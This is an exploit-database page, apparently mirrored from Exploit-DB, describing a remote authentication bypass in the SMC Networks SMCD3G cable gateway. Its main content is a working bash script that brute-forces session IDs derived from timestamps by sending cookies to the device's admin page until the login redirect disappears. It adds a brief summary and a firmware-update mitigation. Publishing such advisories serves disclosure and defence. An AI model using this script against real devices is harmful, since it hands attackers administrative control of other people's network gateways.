header-logo
Suggest Exploit
vendor:
SMCD3G Gateway
by:
SecurityFocus
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: SMCD3G Gateway
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2009

SMC Networks SMCD3G Gateway Remote Authentication Bypass Vulnerability

An attacker can exploit this issue to gain unauthorized administrative access to the affected devices. A bash script can be used to find the session ID of the device, which can then be used to gain access.

Mitigation:

Ensure that the device is running the latest version of the firmware and that all security patches have been applied.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46178/info

The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.

An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.

#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found:  $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done

Navigation

Suggest Exploit

Services By CQR